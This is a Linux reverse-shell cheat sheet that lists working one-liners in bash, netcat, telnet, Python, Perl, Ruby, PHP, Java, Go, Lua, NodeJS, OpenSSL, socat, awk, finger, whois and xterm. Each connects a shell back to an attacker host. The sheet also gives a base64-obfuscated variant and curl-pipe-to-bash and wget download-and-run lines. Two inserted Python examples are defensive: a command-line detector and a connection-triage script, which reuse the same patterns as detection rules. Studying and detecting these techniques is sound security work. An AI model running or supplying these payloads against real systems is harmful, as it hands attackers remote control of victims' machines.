Shells - Linux
If you have questions about any of these shells, you can check them with https://explainshell.com/

Full TTY

Once you get a reverse shell read this page to obtain a full TTY.

Bash | sh

curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell, to get the output execute
exec >&0
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

Symbol safe shell

#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "nohup bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
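Every variant in this section, including the base64-encoded one, reaches the target as a process command line that a host agent (auditd EXECVE records, osquery process events, an EDR) can capture. The following is an added example, not code from the original page or from any of its sources, of a detector that matches captured command lines against the shapes catalogued on this page and also decodes long base64 arguments, so the encoded form cannot hide the `/dev/tcp` redirection. It goes beyond this section and also covers the netcat, FIFO, Python and socat forms listed further down the page. The rule set and the sample command lines are constructed for the example; only the base64 blob is the one shown above.

```python
import base64
import re

# Constructed process command lines, as a host agent would report them. The
# IP/port values are the placeholders used in this page's own one-liners and
# the base64 blob is the one shown in the "Symbol safe shell" section.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.8.4.185/4444 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.4.185 4444 >/tmp/f",
    "nc -e /bin/sh 10.8.4.185 4444",
    "echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK "
    "| base64 -d | bash 2>/dev/null",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "socat TCP4:10.0.0.1:1337 EXEC:bash,pty,stderr,setsid,sigint,sane",
    "grep -r TODO /srv/app",                                      # benign
    "echo VGhpcyBpcyBhIGJlbmlnbiBjb25maWcgdmFsdWUK | base64 -d",  # benign base64
]

# Detection rules: (name, regex). Each pattern is the stable shape of one
# technique on this page rather than a specific IP or port, so changing the
# listener address does not evade it.
RULES = [
    ("bash-devtcp",     re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+")),
    ("nc-exec",         re.compile(r"\bnc(at)?\b.*(\s-e\s+\S*sh\b|--exec)")),
    ("fifo-pipe-shell", re.compile(r"\b(mkfifo|mknod)\s+\S+.*\|\s*/bin/(ba)?sh\b")),
    ("python-dup2",     re.compile(r"socket\.socket\(.*\bdup2\(")),
    ("socat-exec",      re.compile(r"\bsocat\b.*\bEXEC:")),
]

# Any run of 20+ base64 alphabet characters is worth decoding before matching.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_base64_tokens(cmdline):
    """Return the decodable, printable text of base64-looking tokens in a command line."""
    decoded = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="replace").strip()
        if text and text.isprintable():
            decoded.append(text)
    return decoded


def scan_cmdline(cmdline):
    """Return the names of the rules matching the command line, checking both
    the raw text and the decoded content of any base64 argument it carries."""
    candidates = [cmdline] + decode_base64_tokens(cmdline)
    return [name for name, rx in RULES if any(rx.search(c) for c in candidates)]


def scan_all(cmdlines):
    """Return {cmdline: [rule names]} for every command line that hits a rule."""
    flagged = {}
    for cmd in cmdlines:
        hits = scan_cmdline(cmd)
        if hits:
            flagged[cmd] = hits
    return flagged


if __name__ == "__main__":
    for cmd, hits in scan_all(SAMPLE_CMDLINES).items():
        print(", ".join(hits).ljust(18), cmd[:70])
```

The base64 step is what makes the "stealthier" variant visible: the raw command line contains nothing but `echo`, `base64 -d` and `bash`, and only the decoded argument carries the `/dev/tcp/` redirection. Keep the rules anchored on the technique (redirection target, `-e`, FIFO-to-shell pipe, `dup2` after `socket`) rather than on addresses or ports, and treat a hit from a service account as the highest-priority case.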

Create in file and execute

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh

Forward Shell

You might find cases where you have RCE in a web app on a Linux machine but, because of iptables rules or other filtering, you cannot get a reverse shell. This "shell" lets you keep a PTY shell through that RCE by using pipes inside the victim system. You can find the code at https://github.com/IppSec/forward-shell
You just need to modify:
  • The URL of the vulnerable host
  • The prefix and suffix of your payload (if any)
  • The way the payload is sent (headers? data? extra info?)
Then you can just send commands, or use the upgrade command to get a full PTY (note that the pipes are read and written with a delay of roughly 1.3 s).

Netcat

nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Telnet

telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT1> | /bin/bash | telnet <ATTACKER-IP> <PORT2> #Two listeners: one for input, one for output
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Whois

Attacker
while true; do nc -l <port>; done
To send the command, write it down, press Enter and then press CTRL+D (to stop STDIN)
Victim
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done

Python

#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Perl

perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ncat

victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Lua

#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()

or

// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

OpenSSL

Attacker (Kali)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
Victim
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Socat

Bind shell

victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

Reverse shell

attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Awk

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Finger

Attacker
while true; do nc -l 79; done
To send the command, write it down, press Enter and then press CTRL+D (to stop STDIN)
Victim
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null)`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done

Gawk

#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X server (:1, which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You'll need to authorise the target to connect to you (command also run on your host):
xhost +targetip
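The whois, finger and xterm channels above, like the `/dev/tcp`, netcat and socat forms earlier on the page, share one network-side footprint: an outbound connection owned by a process that has no business making one. The following is an added example, not code from the original page or from any of its sources, showing how a host agent's inventory of established connections can be triaged against that footprint. The record shape, the service-account set, the egress allowlist and the list of shell-like program names are assumptions for the example, and the connection records are constructed.

```python
from collections import namedtuple

# Constructed connection records in the shape a host agent could assemble from
# `ss -tnp` plus the owning process's user; every value here is invented.
Conn = namedtuple("Conn", "user comm direction raddr rport")

SAMPLE_CONNS = [
    Conn("www-data", "whois",   "out", "10.0.0.1",    43),
    Conn("www-data", "finger",  "out", "10.0.0.1",    79),
    Conn("www-data", "xterm",   "out", "10.0.0.1",    6001),
    Conn("www-data", "bash",    "out", "10.0.0.1",    4444),
    Conn("www-data", "apache2", "in",  "203.0.113.9", 39012),   # a client hitting the web app
    Conn("root",     "apt",     "out", "10.10.10.1",  443),     # package mirror, allowlisted
    Conn("alice",    "ssh",     "out", "10.10.10.2",  22),      # interactive user
]

# Accounts that run network services and should not open arbitrary outbound
# connections (assumed set; tune per host).
SERVICE_ACCOUNTS = {"www-data", "nginx", "apache", "tomcat", "nobody"}

# Outbound (address, port) pairs a service account may legitimately reach,
# e.g. an internal package mirror (assumed for this example).
EGRESS_ALLOWLIST = {("10.10.10.1", 443)}

# Destination ports of the low-bandwidth channels on this page: whois (43),
# finger (79) and the X11 display :1 that `xterm -display host:1` dials (6001).
LEGACY_CHANNEL_PORTS = {43: "whois", 79: "finger", 6001: "x11"}

# Programs that should never own a TCP socket themselves. A shell holding one
# is the footprint of `/dev/tcp`; nc/socat/telnet/openssl/awk holding one under
# a service account matches the relays catalogued on this page (assumed list).
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "ksh", "nc", "ncat", "socat",
              "telnet", "openssl", "awk", "gawk"}


def classify(conn):
    """Return the reasons (possibly none) this connection deserves attention."""
    reasons = []
    if conn.direction != "out":
        return reasons                      # inbound client traffic is the service's job
    if conn.rport in LEGACY_CHANNEL_PORTS:
        reasons.append("legacy-channel:" + LEGACY_CHANNEL_PORTS[conn.rport])
    if conn.comm in SHELL_LIKE:
        reasons.append("shell-owns-socket")
    if conn.user in SERVICE_ACCOUNTS and (conn.raddr, conn.rport) not in EGRESS_ALLOWLIST:
        reasons.append("service-account-egress")
    return reasons


def triage(conns):
    """Return [(conn, reasons)] for every flagged connection, in input order."""
    return [(c, classify(c)) for c in conns if classify(c)]


if __name__ == "__main__":
    for conn, reasons in triage(SAMPLE_CONNS):
        print(f"{conn.user:9} {conn.comm:8} -> {conn.raddr}:{conn.rport:<5} {', '.join(reasons)}")
```

The point of the three independent checks is that they fail in different ways: the port check catches the whois/finger/X11 channels even when the client binary is a legitimate one, the program-name check catches `/dev/tcp` and the netcat relays whatever port they use, and the service-account check is the backstop for anything else. Enforcing the same allowlist as an egress firewall rule for the service account turns most of this page's one-liners into connection failures rather than alerts.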

Groovy

by frohoff. NOTE: the Java reverse shell also works for Groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Bibliography

Reverse Shell Cheat Sheet (pentestmonkey)
Using Whois and Finger for Reverse Shells
PayloadsAllTheThings: Reverse Shell Cheatsheet.md (swisskyrepo/PayloadsAllTheThings, GitHub)